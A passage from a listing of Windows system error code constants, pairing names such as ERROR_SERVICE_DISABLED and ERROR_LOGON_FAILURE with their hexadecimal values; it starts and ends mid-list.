ERROR_DRIVER_CANCEL_TIMEOUT = 0x0252 - ERROR_REPLY_MESSAGE_MISMATCH = 0x0253 - ERROR_LOST_WRITEBEHIND_DATA = 0x0254 - ERROR_CLIENT_SERVER_PARAMETERS_INVALID = 0x0255 - ERROR_NOT_TINY_STREAM = 0x0256 - ERROR_STACK_OVERFLOW_READ = 0x0257 - ERROR_CONVERT_TO_LARGE = 0x0258 - ERROR_FOUND_OUT_OF_SCOPE = 0x0259 - ERROR_ALLOCATE_BUCKET = 0x025A - ERROR_MARSHALL_OVERFLOW = 0x025B - ERROR_INVALID_VARIANT = 0x025C - ERROR_BAD_COMPRESSION_BUFFER = 0x025D - ERROR_AUDIT_FAILED = 0x025E - ERROR_TIMER_RESOLUTION_NOT_SET = 0x025F - ERROR_INSUFFICIENT_LOGON_INFO = 0x0260 - ERROR_BAD_DLL_ENTRYPOINT = 0x0261 - ERROR_BAD_SERVICE_ENTRYPOINT = 0x0262 - ERROR_IP_ADDRESS_CONFLICT1 = 0x0263 - ERROR_IP_ADDRESS_CONFLICT2 = 0x0264 - ERROR_REGISTRY_QUOTA_LIMIT = 0x0265 - ERROR_NO_CALLBACK_ACTIVE = 0x0266 - ERROR_PWD_TOO_SHORT = 0x0267 - ERROR_PWD_TOO_RECENT = 0x0268 - ERROR_PWD_HISTORY_CONFLICT = 0x0269 - ERROR_UNSUPPORTED_COMPRESSION = 0x026A - ERROR_INVALID_HW_PROFILE = 0x026B - ERROR_INVALID_PLUGPLAY_DEVICE_PATH = 0x026C - ERROR_QUOTA_LIST_INCONSISTENT = 0x026D - ERROR_EVALUATION_EXPIRATION = 0x026E - ERROR_ILLEGAL_DLL_RELOCATION = 0x026F - ERROR_DLL_INIT_FAILED_LOGOFF = 0x0270 - ERROR_VALIDATE_CONTINUE = 0x0271 - ERROR_NO_MORE_MATCHES = 0x0272 - ERROR_RANGE_LIST_CONFLICT = 0x0273 - ERROR_SERVER_SID_MISMATCH = 0x0274 - ERROR_CANT_ENABLE_DENY_ONLY = 0x0275 - ERROR_FLOAT_MULTIPLE_FAULTS = 0x0276 - ERROR_FLOAT_MULTIPLE_TRAPS = 0x0277 - ERROR_NOINTERFACE = 0x0278 - ERROR_DRIVER_FAILED_SLEEP = 0x0279 - ERROR_CORRUPT_SYSTEM_FILE = 0x027A - ERROR_COMMITMENT_MINIMUM = 0x027B - ERROR_PNP_RESTART_ENUMERATION = 0x027C - ERROR_SYSTEM_IMAGE_BAD_SIGNATURE = 0x027D - ERROR_PNP_REBOOT_REQUIRED = 0x027E - ERROR_INSUFFICIENT_POWER = 0x027F - ERROR_MULTIPLE_FAULT_VIOLATION = 0x0280 - ERROR_SYSTEM_SHUTDOWN = 0x0281 - ERROR_PORT_NOT_SET = 0x0282 - ERROR_DS_VERSION_CHECK_FAILURE = 0x0283 - ERROR_RANGE_NOT_FOUND = 0x0284 - ERROR_NOT_SAFE_MODE_DRIVER = 0x0286 - ERROR_FAILED_DRIVER_ENTRY = 0x0287 - ERROR_DEVICE_ENUMERATION_ERROR = 0x0288 - ERROR_MOUNT_POINT_NOT_RESOLVED = 0x0289 - ERROR_INVALID_DEVICE_OBJECT_PARAMETER = 0x028A - ERROR_MCA_OCCURED = 0x028B - ERROR_DRIVER_DATABASE_ERROR = 0x028C - ERROR_SYSTEM_HIVE_TOO_LARGE = 0x028D - ERROR_DRIVER_FAILED_PRIOR_UNLOAD = 0x028E - ERROR_VOLSNAP_PREPARE_HIBERNATE = 0x028F - ERROR_HIBERNATION_FAILURE = 0x0290 - ERROR_FILE_SYSTEM_LIMITATION = 0x0299 - ERROR_ASSERTION_FAILURE = 0x029C - ERROR_ACPI_ERROR = 0x029D - ERROR_WOW_ASSERTION = 0x029E - ERROR_PNP_BAD_MPS_TABLE = 0x029F - ERROR_PNP_TRANSLATION_FAILED = 0x02A0 - ERROR_PNP_IRQ_TRANSLATION_FAILED = 0x02A1 - ERROR_PNP_INVALID_ID = 0x02A2 - ERROR_WAKE_SYSTEM_DEBUGGER = 0x02A3 - ERROR_HANDLES_CLOSED = 0x02A4 - ERROR_EXTRANEOUS_INFORMATION = 0x02A5 - ERROR_RXACT_COMMIT_NECESSARY = 0x02A6 - ERROR_MEDIA_CHECK = 0x02A7 - ERROR_GUID_SUBSTITUTION_MADE = 0x02A8 - ERROR_STOPPED_ON_SYMLINK = 0x02A9 - ERROR_LONGJUMP = 0x02AA - ERROR_PLUGPLAY_QUERY_VETOED = 0x02AB - ERROR_UNWIND_CONSOLIDATE = 0x02AC - ERROR_REGISTRY_HIVE_RECOVERED = 0x02AD - ERROR_DLL_MIGHT_BE_INSECURE = 0x02AE - ERROR_DLL_MIGHT_BE_INCOMPATIBLE = 0x02AF - ERROR_DBG_EXCEPTION_NOT_HANDLED = 0x02B0 - ERROR_DBG_REPLY_LATER = 0x02B1 - ERROR_DBG_UNABLE_TO_PROVIDE_HANDLE = 0x02B2 - ERROR_DBG_TERMINATE_THREAD = 0x02B3 - ERROR_DBG_TERMINATE_PROCESS = 0x02B4 - ERROR_DBG_CONTROL_C = 0x02B5 - ERROR_DBG_PRINTEXCEPTION_C = 0x02B6 - ERROR_DBG_RIPEXCEPTION = 0x02B7 - ERROR_DBG_CONTROL_BREAK = 0x02B8 - ERROR_DBG_COMMAND_EXCEPTION = 0x02B9 - ERROR_OBJECT_NAME_EXISTS = 0x02BA - ERROR_THREAD_WAS_SUSPENDED = 0x02BB - ERROR_IMAGE_NOT_AT_BASE = 0x02BC - ERROR_RXACT_STATE_CREATED = 0x02BD - ERROR_SEGMENT_NOTIFICATION = 0x02BE - ERROR_BAD_CURRENT_DIRECTORY = 0x02BF - ERROR_FT_READ_RECOVERY_FROM_BACKUP = 0x02C0 - ERROR_FT_WRITE_RECOVERY = 0x02C1 - ERROR_IMAGE_MACHINE_TYPE_MISMATCH = 0x02C2 - ERROR_RECEIVE_PARTIAL = 0x02C3 - ERROR_RECEIVE_EXPEDITED = 0x02C4 - ERROR_RECEIVE_PARTIAL_EXPEDITED = 0x02C5 - ERROR_EVENT_DONE = 0x02C6 - ERROR_EVENT_PENDING = 0x02C7 - ERROR_CHECKING_FILE_SYSTEM = 0x02C8 - ERROR_FATAL_APP_EXIT = 0x02C9 - ERROR_PREDEFINED_HANDLE = 0x02CA - ERROR_WAS_UNLOCKED = 0x02CB - ERROR_SERVICE_NOTIFICATION = 0x02CC - ERROR_WAS_LOCKED = 0x02CD - ERROR_LOG_HARD_ERROR = 0x02CE - ERROR_ALREADY_WIN32 = 0x02CF - ERROR_IMAGE_MACHINE_TYPE_MISMATCH_EXE = 0x02D0 - ERROR_NO_YIELD_PERFORMED = 0x02D1 - ERROR_TIMER_RESUME_IGNORED = 0x02D2 - ERROR_ARBITRATION_UNHANDLED = 0x02D3 - ERROR_CARDBUS_NOT_SUPPORTED = 0x02D4 - ERROR_MP_PROCESSOR_MISMATCH = 0x02D5 - ERROR_HIBERNATED = 0x02D6 - ERROR_RESUME_HIBERNATION = 0x02D7 - ERROR_FIRMWARE_UPDATED = 0x02D8 - ERROR_DRIVERS_LEAKING_LOCKED_PAGES = 0x02D9 - ERROR_WAKE_SYSTEM = 0x02DA - ERROR_WAIT_1 = 0x02DB - ERROR_WAIT_2 = 0x02DC - ERROR_WAIT_3 = 0x02DD - ERROR_WAIT_63 = 0x02DE - ERROR_ABANDONED_WAIT_0 = 0x02DF - ERROR_ABANDONED_WAIT_63 = 0x02E0 - ERROR_USER_APC = 0x02E1 - ERROR_KERNEL_APC = 0x02E2 - ERROR_ALERTED = 0x02E3 - ERROR_ELEVATION_REQUIRED = 0x02E4 - ERROR_REPARSE = 0x02E5 - ERROR_OPLOCK_BREAK_IN_PROGRESS = 0x02E6 - ERROR_VOLUME_MOUNTED = 0x02E7 - ERROR_RXACT_COMMITTED = 0x02E8 - ERROR_NOTIFY_CLEANUP = 0x02E9 - ERROR_PRIMARY_TRANSPORT_CONNECT_FAILED = 0x02EA - ERROR_PAGE_FAULT_TRANSITION = 0x02EB - ERROR_PAGE_FAULT_DEMAND_ZERO = 0x02EC - ERROR_PAGE_FAULT_COPY_ON_WRITE = 0x02ED - ERROR_PAGE_FAULT_GUARD_PAGE = 0x02EE - ERROR_PAGE_FAULT_PAGING_FILE = 0x02EF - ERROR_CACHE_PAGE_LOCKED = 0x02F0 - ERROR_CRASH_DUMP = 0x02F1 - ERROR_BUFFER_ALL_ZEROS = 0x02F2 - ERROR_REPARSE_OBJECT = 0x02F3 - ERROR_RESOURCE_REQUIREMENTS_CHANGED = 0x02F4 - ERROR_TRANSLATION_COMPLETE = 0x02F5 - ERROR_NOTHING_TO_TERMINATE = 0x02F6 - ERROR_PROCESS_NOT_IN_JOB = 0x02F7 - ERROR_PROCESS_IN_JOB = 0x02F8 - ERROR_VOLSNAP_HIBERNATE_READY = 0x02F9 - ERROR_FSFILTER_OP_COMPLETED_SUCCESSFULLY = 0x02FA - ERROR_INTERRUPT_VECTOR_ALREADY_CONNECTED = 0x02FB - ERROR_INTERRUPT_STILL_CONNECTED = 0x02FC - ERROR_WAIT_FOR_OPLOCK = 0x02FD - ERROR_DBG_EXCEPTION_HANDLED = 0x02FE - ERROR_DBG_CONTINUE = 0x02FF - ERROR_CALLBACK_POP_STACK = 0x0300 - ERROR_COMPRESSION_DISABLED = 0x0301 - ERROR_CANTFETCHBACKWARDS = 0x0302 - ERROR_CANTSCROLLBACKWARDS = 0x0303 - ERROR_ROWSNOTRELEASED = 0x0304 - ERROR_BAD_ACCESSOR_FLAGS = 0x0305 - ERROR_ERRORS_ENCOUNTERED = 0x0306 - ERROR_NOT_CAPABLE = 0x0307 - ERROR_REQUEST_OUT_OF_SEQUENCE = 0x0308 - ERROR_VERSION_PARSE_ERROR = 0x0309 - ERROR_BADSTARTPOSITION = 0x030A - ERROR_MEMORY_HARDWARE = 0x030B - ERROR_DISK_REPAIR_DISABLED = 0x030C - ERROR_INSUFFICIENT_RESOURCE_FOR_SPECIFIED_SHARED_SECTION_SIZE = 0x030D - ERROR_SYSTEM_POWERSTATE_TRANSITION = 0x030E - ERROR_SYSTEM_POWERSTATE_COMPLEX_TRANSITION = 0x030F - ERROR_MCA_EXCEPTION = 0x0310 - ERROR_ACCESS_AUDIT_BY_POLICY = 0x0311 - ERROR_ACCESS_DISABLED_NO_SAFER_UI_BY_POLICY = 0x0312 - ERROR_ABANDON_HIBERFILE = 0x0313 - ERROR_LOST_WRITEBEHIND_DATA_NETWORK_DISCONNECTED = 0x0314 - ERROR_LOST_WRITEBEHIND_DATA_NETWORK_SERVER_ERROR = 0x0315 - ERROR_LOST_WRITEBEHIND_DATA_LOCAL_DISK_ERROR = 0x0316 - ERROR_BAD_MCFG_TABLE = 0x0317 - ERROR_OPLOCK_SWITCHED_TO_NEW_HANDLE = 0x0320 - ERROR_CANNOT_GRANT_REQUESTED_OPLOCK = 0x0321 - ERROR_CANNOT_BREAK_OPLOCK = 0x0322 - ERROR_OPLOCK_HANDLE_CLOSED = 0x0323 - ERROR_NO_ACE_CONDITION = 0x0324 - ERROR_INVALID_ACE_CONDITION = 0x0325 - ERROR_EA_ACCESS_DENIED = 0x03E2 - ERROR_OPERATION_ABORTED = 0x03E3 - ERROR_IO_INCOMPLETE = 0x03E4 - ERROR_IO_PENDING = 0x03E5 - ERROR_NOACCESS = 0x03E6 - ERROR_SWAPERROR = 0x03E7 - ERROR_STACK_OVERFLOW = 0x03E9 - ERROR_INVALID_MESSAGE = 0x03EA - ERROR_CAN_NOT_COMPLETE = 0x03EB - ERROR_INVALID_FLAGS = 0x03EC - ERROR_UNRECOGNIZED_VOLUME = 0x03ED - ERROR_FILE_INVALID = 0x03EE - ERROR_FULLSCREEN_MODE = 0x03EF - ERROR_NO_TOKEN = 0x03F0 - ERROR_BADDB = 0x03F1 - ERROR_BADKEY = 0x03F2 - ERROR_CANTOPEN = 0x03F3 - ERROR_CANTREAD = 0x03F4 - ERROR_CANTWRITE = 0x03F5 - ERROR_REGISTRY_RECOVERED = 0x03F6 - ERROR_REGISTRY_CORRUPT = 0x03F7 - ERROR_REGISTRY_IO_FAILED = 0x03F8 - ERROR_NOT_REGISTRY_FILE = 0x03F9 - ERROR_KEY_DELETED = 0x03FA - ERROR_NO_LOG_SPACE = 0x03FB - ERROR_KEY_HAS_CHILDREN = 0x03FC - ERROR_CHILD_MUST_BE_VOLATILE = 0x03FD - ERROR_NOTIFY_ENUM_DIR = 0x03FE - ERROR_DEPENDENT_SERVICES_RUNNING = 0x041B - ERROR_INVALID_SERVICE_CONTROL = 0x041C - ERROR_SERVICE_REQUEST_TIMEOUT = 0x041D - ERROR_SERVICE_NO_THREAD = 0x041E - ERROR_SERVICE_DATABASE_LOCKED = 0x041F - ERROR_SERVICE_ALREADY_RUNNING = 0x0420 - ERROR_INVALID_SERVICE_ACCOUNT = 0x0421 - ERROR_SERVICE_DISABLED = 0x0422 - ERROR_CIRCULAR_DEPENDENCY = 0x0423 - ERROR_SERVICE_DOES_NOT_EXIST = 0x0424 - ERROR_SERVICE_CANNOT_ACCEPT_CTRL = 0x0425 - ERROR_SERVICE_NOT_ACTIVE = 0x0426 - ERROR_FAILED_SERVICE_CONTROLLER_CONNECT = 0x0427 - ERROR_EXCEPTION_IN_SERVICE = 0x0428 - ERROR_DATABASE_DOES_NOT_EXIST = 0x0429 - ERROR_SERVICE_SPECIFIC_ERROR = 0x042A - ERROR_PROCESS_ABORTED = 0x042B - ERROR_SERVICE_DEPENDENCY_FAIL = 0x042C - ERROR_SERVICE_LOGON_FAILED = 0x042D - ERROR_SERVICE_START_HANG = 0x042E - ERROR_INVALID_SERVICE_LOCK = 0x042F - ERROR_SERVICE_MARKED_FOR_DELETE = 0x0430 - ERROR_SERVICE_EXISTS = 0x0431 - ERROR_ALREADY_RUNNING_LKG = 0x0432 - ERROR_SERVICE_DEPENDENCY_DELETED = 0x0433 - ERROR_BOOT_ALREADY_ACCEPTED = 0x0434 - ERROR_SERVICE_NEVER_STARTED = 0x0435 - ERROR_DUPLICATE_SERVICE_NAME = 0x0436 - ERROR_DIFFERENT_SERVICE_ACCOUNT = 0x0437 - ERROR_CANNOT_DETECT_DRIVER_FAILURE = 0x0438 - ERROR_CANNOT_DETECT_PROCESS_ABORT = 0x0439 - ERROR_NO_RECOVERY_PROGRAM = 0x043A - ERROR_SERVICE_NOT_IN_EXE = 0x043B - ERROR_NOT_SAFEBOOT_SERVICE = 0x043C - ERROR_END_OF_MEDIA = 0x044C - ERROR_FILEMARK_DETECTED = 0x044D - ERROR_BEGINNING_OF_MEDIA = 0x044E - ERROR_SETMARK_DETECTED = 0x044F - ERROR_NO_DATA_DETECTED = 0x0450 - ERROR_PARTITION_FAILURE = 0x0451 - ERROR_INVALID_BLOCK_LENGTH = 0x0452 - ERROR_DEVICE_NOT_PARTITIONED = 0x0453 - ERROR_UNABLE_TO_LOCK_MEDIA = 0x0454 - ERROR_UNABLE_TO_UNLOAD_MEDIA = 0x0455 - ERROR_MEDIA_CHANGED = 0x0456 - ERROR_BUS_RESET = 0x0457 - ERROR_NO_MEDIA_IN_DRIVE = 0x0458 - ERROR_NO_UNICODE_TRANSLATION = 0x0459 - ERROR_DLL_INIT_FAILED = 0x045A - ERROR_SHUTDOWN_IN_PROGRESS = 0x045B - ERROR_NO_SHUTDOWN_IN_PROGRESS = 0x045C - ERROR_IO_DEVICE = 0x045D - ERROR_SERIAL_NO_DEVICE = 0x045E - ERROR_IRQ_BUSY = 0x045F - ERROR_MORE_WRITES = 0x0460 - ERROR_COUNTER_TIMEOUT = 0x0461 - ERROR_FLOPPY_ID_MARK_NOT_FOUND = 0x0462 - ERROR_FLOPPY_WRONG_CYLINDER = 0x0463 - ERROR_FLOPPY_UNKNOWN_ERROR = 0x0464 - ERROR_FLOPPY_BAD_REGISTERS = 0x0465 - ERROR_DISK_RECALIBRATE_FAILED = 0x0466 - ERROR_DISK_OPERATION_FAILED = 0x0467 - ERROR_DISK_RESET_FAILED = 0x0468 - ERROR_EOM_OVERFLOW = 0x0469 - ERROR_NOT_ENOUGH_SERVER_MEMORY = 0x046A - ERROR_POSSIBLE_DEADLOCK = 0x046B - ERROR_MAPPED_ALIGNMENT = 0x046C - ERROR_SET_POWER_STATE_VETOED = 0x0474 - ERROR_SET_POWER_STATE_FAILED = 0x0475 - ERROR_TOO_MANY_LINKS = 0x0476 - ERROR_OLD_WIN_VERSION = 0x047E - ERROR_APP_WRONG_OS = 0x047F - ERROR_SINGLE_INSTANCE_APP = 0x0480 - ERROR_RMODE_APP = 0x0481 - ERROR_INVALID_DLL = 0x0482 - ERROR_NO_ASSOCIATION = 0x0483 - ERROR_DDE_FAIL = 0x0484 - ERROR_DLL_NOT_FOUND = 0x0485 - ERROR_NO_MORE_USER_HANDLES = 0x0486 - ERROR_MESSAGE_SYNC_ONLY = 0x0487 - ERROR_SOURCE_ELEMENT_EMPTY = 0x0488 - ERROR_DESTINATION_ELEMENT_FULL = 0x0489 - ERROR_ILLEGAL_ELEMENT_ADDRESS = 0x048A - ERROR_MAGAZINE_NOT_PRESENT = 0x048B - ERROR_DEVICE_REINITIALIZATION_NEEDED = 0x048C - ERROR_DEVICE_REQUIRES_CLEANING = 0x048D - ERROR_DEVICE_DOOR_OPEN = 0x048E - ERROR_DEVICE_NOT_CONNECTED = 0x048F - ERROR_NOT_FOUND = 0x0490 - ERROR_NO_MATCH = 0x0491 - ERROR_SET_NOT_FOUND = 0x0492 - ERROR_POINT_NOT_FOUND = 0x0493 - ERROR_NO_TRACKING_SERVICE = 0x0494 - ERROR_NO_VOLUME_ID = 0x0495 - ERROR_UNABLE_TO_REMOVE_REPLACED = 0x0497 - ERROR_UNABLE_TO_MOVE_REPLACEMENT = 0x0498 - ERROR_UNABLE_TO_MOVE_REPLACEMENT_2 = 0x0499 - ERROR_JOURNAL_DELETE_IN_PROGRESS = 0x049A - ERROR_JOURNAL_NOT_ACTIVE = 0x049B - ERROR_POTENTIAL_FILE_FOUND = 0x049C - ERROR_JOURNAL_ENTRY_DELETED = 0x049D - ERROR_SHUTDOWN_IS_SCHEDULED = 0x04A6 - ERROR_SHUTDOWN_USERS_LOGGED_ON = 0x04A7 - ERROR_BAD_DEVICE = 0x04B0 - ERROR_CONNECTION_UNAVAIL = 0x04B1 - ERROR_DEVICE_ALREADY_REMEMBERED = 0x04B2 - ERROR_NO_NET_OR_BAD_PATH = 0x04B3 - ERROR_BAD_PROVIDER = 0x04B4 - ERROR_CANNOT_OPEN_PROFILE = 0x04B5 - ERROR_BAD_PROFILE = 0x04B6 - ERROR_NOT_CONTAINER = 0x04B7 - ERROR_EXTENDED_ERROR = 0x04B8 - ERROR_INVALID_GROUPNAME = 0x04B9 - ERROR_INVALID_COMPUTERNAME = 0x04BA - ERROR_INVALID_EVENTNAME = 0x04BB - ERROR_INVALID_DOMAINNAME = 0x04BC - ERROR_INVALID_SERVICENAME = 0x04BD - ERROR_INVALID_NETNAME = 0x04BE - ERROR_INVALID_SHARENAME = 0x04BF - ERROR_INVALID_PASSWORDNAME = 0x04C0 - ERROR_INVALID_MESSAGENAME = 0x04C1 - ERROR_INVALID_MESSAGEDEST = 0x04C2 - ERROR_SESSION_CREDENTIAL_CONFLICT = 0x04C3 - ERROR_REMOTE_SESSION_LIMIT_EXCEEDED = 0x04C4 - ERROR_DUP_DOMAINNAME = 0x04C5 - ERROR_NO_NETWORK = 0x04C6 - ERROR_CANCELLED = 0x04C7 - ERROR_USER_MAPPED_FILE = 0x04C8 - ERROR_CONNECTION_REFUSED = 0x04C9 - ERROR_GRACEFUL_DISCONNECT = 0x04CA - ERROR_ADDRESS_ALREADY_ASSOCIATED = 0x04CB - ERROR_ADDRESS_NOT_ASSOCIATED = 0x04CC - ERROR_CONNECTION_INVALID = 0x04CD - ERROR_CONNECTION_ACTIVE = 0x04CE - ERROR_NETWORK_UNREACHABLE = 0x04CF - ERROR_HOST_UNREACHABLE = 0x04D0 - ERROR_PROTOCOL_UNREACHABLE = 0x04D1 - ERROR_PORT_UNREACHABLE = 0x04D2 - ERROR_REQUEST_ABORTED = 0x04D3 - ERROR_CONNECTION_ABORTED = 0x04D4 - ERROR_RETRY = 0x04D5 - ERROR_CONNECTION_COUNT_LIMIT = 0x04D6 - ERROR_LOGIN_TIME_RESTRICTION = 0x04D7 - ERROR_LOGIN_WKSTA_RESTRICTION = 0x04D8 - ERROR_INCORRECT_ADDRESS = 0x04D9 - ERROR_ALREADY_REGISTERED = 0x04DA - ERROR_SERVICE_NOT_FOUND = 0x04DB - ERROR_NOT_AUTHENTICATED = 0x04DC - ERROR_NOT_LOGGED_ON = 0x04DD - ERROR_CONTINUE = 0x04DE - ERROR_ALREADY_INITIALIZED = 0x04DF - ERROR_NO_MORE_DEVICES = 0x04E0 - ERROR_NO_SUCH_SITE = 0x04E1 - ERROR_DOMAIN_CONTROLLER_EXISTS = 0x04E2 - ERROR_ONLY_IF_CONNECTED = 0x04E3 - ERROR_OVERRIDE_NOCHANGES = 0x04E4 - ERROR_BAD_USER_PROFILE = 0x04E5 - ERROR_NOT_SUPPORTED_ON_SBS = 0x04E6 - ERROR_SERVER_SHUTDOWN_IN_PROGRESS = 0x04E7 - ERROR_HOST_DOWN = 0x04E8 - ERROR_NON_ACCOUNT_SID = 0x04E9 - ERROR_NON_DOMAIN_SID = 0x04EA - ERROR_APPHELP_BLOCK = 0x04EB - ERROR_ACCESS_DISABLED_BY_POLICY = 0x04EC - ERROR_REG_NAT_CONSUMPTION = 0x04ED - ERROR_CSCSHARE_OFFLINE = 0x04EE - ERROR_PKINIT_FAILURE = 0x04EF - ERROR_SMARTCARD_SUBSYSTEM_FAILURE = 0x04F0 - ERROR_DOWNGRADE_DETECTED = 0x04F1 - ERROR_MACHINE_LOCKED = 0x04F7 - ERROR_CALLBACK_SUPPLIED_INVALID_DATA = 0x04F9 - ERROR_SYNC_FOREGROUND_REFRESH_REQUIRED = 0x04FA - ERROR_DRIVER_BLOCKED = 0x04FB - ERROR_INVALID_IMPORT_OF_NON_DLL = 0x04FC - ERROR_ACCESS_DISABLED_WEBBLADE = 0x04FD - ERROR_ACCESS_DISABLED_WEBBLADE_TAMPER = 0x04FE - ERROR_RECOVERY_FAILURE = 0x04FF - ERROR_ALREADY_FIBER = 0x0500 - ERROR_ALREADY_THREAD = 0x0501 - ERROR_STACK_BUFFER_OVERRUN = 0x0502 - ERROR_PARAMETER_QUOTA_EXCEEDED = 0x0503 - ERROR_DEBUGGER_INACTIVE = 0x0504 - ERROR_DELAY_LOAD_FAILED = 0x0505 - ERROR_VDM_DISALLOWED = 0x0506 - ERROR_UNIDENTIFIED_ERROR = 0x0507 - ERROR_INVALID_CRUNTIME_PARAMETER = 0x0508 - ERROR_BEYOND_VDL = 0x0509 - ERROR_INCOMPATIBLE_SERVICE_SID_TYPE = 0x050A - ERROR_DRIVER_PROCESS_TERMINATED = 0x050B - ERROR_IMPLEMENTATION_LIMIT = 0x050C - ERROR_PROCESS_IS_PROTECTED = 0x050D - ERROR_SERVICE_NOTIFY_CLIENT_LAGGING = 0x050E - ERROR_DISK_QUOTA_EXCEEDED = 0x050F - ERROR_CONTENT_BLOCKED = 0x0510 - ERROR_INCOMPATIBLE_SERVICE_PRIVILEGE = 0x0511 - ERROR_INVALID_LABEL = 0x0513 - ERROR_NOT_ALL_ASSIGNED = 0x0514 - ERROR_SOME_NOT_MAPPED = 0x0515 - ERROR_NO_QUOTAS_FOR_ACCOUNT = 0x0516 - ERROR_LOCAL_USER_SESSION_KEY = 0x0517 - ERROR_NULL_LM_PASSWORD = 0x0518 - ERROR_UNKNOWN_REVISION = 0x0519 - ERROR_REVISION_MISMATCH = 0x051A - ERROR_INVALID_OWNER = 0x051B - ERROR_INVALID_PRIMARY_GROUP = 0x051C - ERROR_NO_IMPERSONATION_TOKEN = 0x051D - ERROR_CANT_DISABLE_MANDATORY = 0x051E - ERROR_NO_LOGON_SERVERS = 0x051F - ERROR_NO_SUCH_LOGON_SESSION = 0x0520 - ERROR_NO_SUCH_PRIVILEGE = 0x0521 - ERROR_PRIVILEGE_NOT_HELD = 0x0522 - ERROR_INVALID_ACCOUNT_NAME = 0x0523 - ERROR_USER_EXISTS = 0x0524 - ERROR_NO_SUCH_USER = 0x0525 - ERROR_GROUP_EXISTS = 0x0526 - ERROR_NO_SUCH_GROUP = 0x0527 - ERROR_MEMBER_IN_GROUP = 0x0528 - ERROR_MEMBER_NOT_IN_GROUP = 0x0529 - ERROR_LAST_ADMIN = 0x052A - ERROR_WRONG_PASSWORD = 0x052B - ERROR_ILL_FORMED_PASSWORD = 0x052C - ERROR_PASSWORD_RESTRICTION = 0x052D - ERROR_LOGON_FAILURE = 0x052E - ERROR_ACCOUNT_RESTRICTION = 0x052F - ERROR_INVALID_LOGON_HOURS = 0x0530 - ERROR_INVALID_WORKSTATION = 0x0531 - ERROR_PASSWORD_EXPIRED = 0x0532 - ERROR_ACCOUNT_DISABLED = 0x0533 - ERROR_NONE_MAPPED = 0x0534 - ERROR_TOO_MANY_LUIDS_REQUESTED = 0x0535 - ERROR_LUIDS_EXHAUSTED = 0x0536 - ERROR_INVALID_SUB_AUTHORITY = 0x0537 - ERROR_INVALID_ACL = 0x0538 - ERROR_INVALID_SID = 0x0539 - ERROR_INVALID_SECURITY_DESCR = 0x053A - ERROR_BAD_INHERITANCE_ACL = 0x053C - ERROR_SERVER_DISABLED = 0x053D - ERROR_SERVER_NOT_DISABLED = 0x053E - ERROR_INVALID_ID_AUTHORITY = 0x053F - ERROR_ALLOTTED_SPACE_EXCEEDED = 0x0540 - ERROR_INVALID_GROUP_ATTRIBUTES = 0x0541 - ERROR_BAD_IMPERSONATION_LEVEL = 0x0542 - ERROR_CANT_OPEN_ANONYMOUS = 0x0543 - ERROR_BAD_VALIDATION_CLASS = 0x0544 - ERROR_BAD_TOKEN_TYPE = 0x0545 - ERROR_NO_SECURITY_ON_OBJECT = 0x0546 - ERROR_CANT_ACCESS_DOMAIN_INFO = 0x0547 - ERROR_INVALID_SERVER_STATE = 0x0548 - ERROR_INVALID_DOMAIN_STATE = 0x0549 - ERROR_INVALID_DOMAIN_ROLE = 0x054A - ERROR_NO_SUCH_DOMAIN = 0x054B - ERROR_DOMAIN_EXISTS = 0x054C - ERROR_DOMAIN_LIMIT_EXCEEDED = 0x054D - ERROR_INTERNAL_DB_CORRUPTION = 0x054E - ERROR_INTERNAL_ERROR = 0x054F - ERROR_GENERIC_NOT_MAPPED = 0x0550 - ERROR_BAD_DESCRIPTOR_FORMAT = 0x0551 - ERROR_NOT_LOGON_PROCESS = 0x0552 - ERROR_LOGON_SESSION_EXISTS = 0x0553 - ERROR_NO_SUCH_PACKAGE = 0x0554 - ERROR_BAD_LOGON_SESSION_STATE = 0x0555 - ERROR_LOGON_SESSION_COLLISION = 0x0556 - ERROR_INVALID_LOGON_TYPE = 0x0557 - ERROR_CANNOT_IMPERSONATE = 0x0558 - ERROR_RXACT_INVALID_STATE = 0x0559 - ERROR_RXACT_COMMIT_FAILURE = 0x055A - ERROR_SPECIAL_ACCOUNT = 0x055B - ERROR_SPECIAL_GROUP = 0x055C - ERROR_SPECIAL_USER = 0x055D - ERROR_MEMBERS_PRIMARY_GROUP = 0x055E - ERROR_TOKEN_ALREADY_IN_USE = 0x055F - ERROR_NO_SUCH_ALIAS = 0x0560 - ERROR_MEMBER_NOT_IN_ALIAS = 0x0561 - ERROR_MEMBER_IN_ALIAS = 0x0562 - ERROR_ALIAS_EXISTS = 0x0563 - ERROR_LOGON_NOT_GRANTED = 0x0564 - ERROR_TOO_MANY_SECRETS = 0x0565 - ERROR_SECRET_TOO_LONG = 0x0566 - ERROR_INTERNAL_DB_ERROR = 0x0567 - ERROR_TOO_MANY_CONTEXT_IDS = 0x0568 - ERROR_LOGON_TYPE_NOT_GRANTED = 0x0569 - ERROR_NT_CROSS_ENCRYPTION_REQUIRED = 0x056A - ERROR_NO_SUCH_MEMBER = 0x056B - ERROR_INVALID_MEMBER = 0x056C - ERROR_TOO_MANY_SIDS = 0x056D - ERROR_LM_CROSS_ENCRYPTION_REQUIRED = 0x056E - ERROR_NO_INHERITANCE = 0x056F - ERROR_FILE_CORRUPT = 0x0570 - ERROR_DISK_CORRUPT = 0x0571 - ERROR_NO_USER_SESSION_KEY = 0x0572 - ERROR_LICENSE_QUOTA_EXCEEDED = 0x0573 - ERROR_WRONG_TARGET_NAME = 0x0574 - ERROR_MUTUAL_AUTH_FAILED = 0x0575 - ERROR_TIME_SKEW = 0x0576 - ERROR_CURRENT_DOMAIN_NOT_ALLOWED = 0x0577 - ERROR_INVALID_WINDOW_HANDLE = 0x0578 - ERROR_INVALID_MENU_HANDLE = 0x0579 - ERROR_INVALID_CURSOR_HANDLE = 0x057A - ERROR_INVALID_ACCEL_HANDLE = 0x057B - ERROR_INVALID_HOOK_HANDLE = 0x057C - ERROR_INVALID_DWP_HANDLE = 0x057D - ERROR_TLW_WITH_WSCHILD = 0x057E - ERROR_CANNOT_FIND_WND_CLASS = 0x057F - ERROR_WINDOW_OF_OTHER_THREAD = 0x0580 - ERROR_HOTKEY_ALREADY_REGISTERED = 0x0581 - ERROR_CLASS_ALREADY_EXISTS = 0x0582 - ERROR_CLASS_DOES_NOT_EXIST = 0x0583 - ERROR_CLASS_HAS_WINDOWS = 0x0584 - ERROR_INVALID_INDEX = 0x0585 - ERROR_INVALID_ICON_HANDLE = 0x0586 - ERROR_PRIVATE_DIALOG_INDEX = 0x0587 - ERROR_LISTBOX_ID_NOT_FOUND = 0x0588 - ERROR_NO_WILDCARD_CHARACTERS = 0x0589 - ERROR_CLIPBOARD_NOT_OPEN = 0x058A - ERROR_HOTKEY_NOT_REGISTERED = 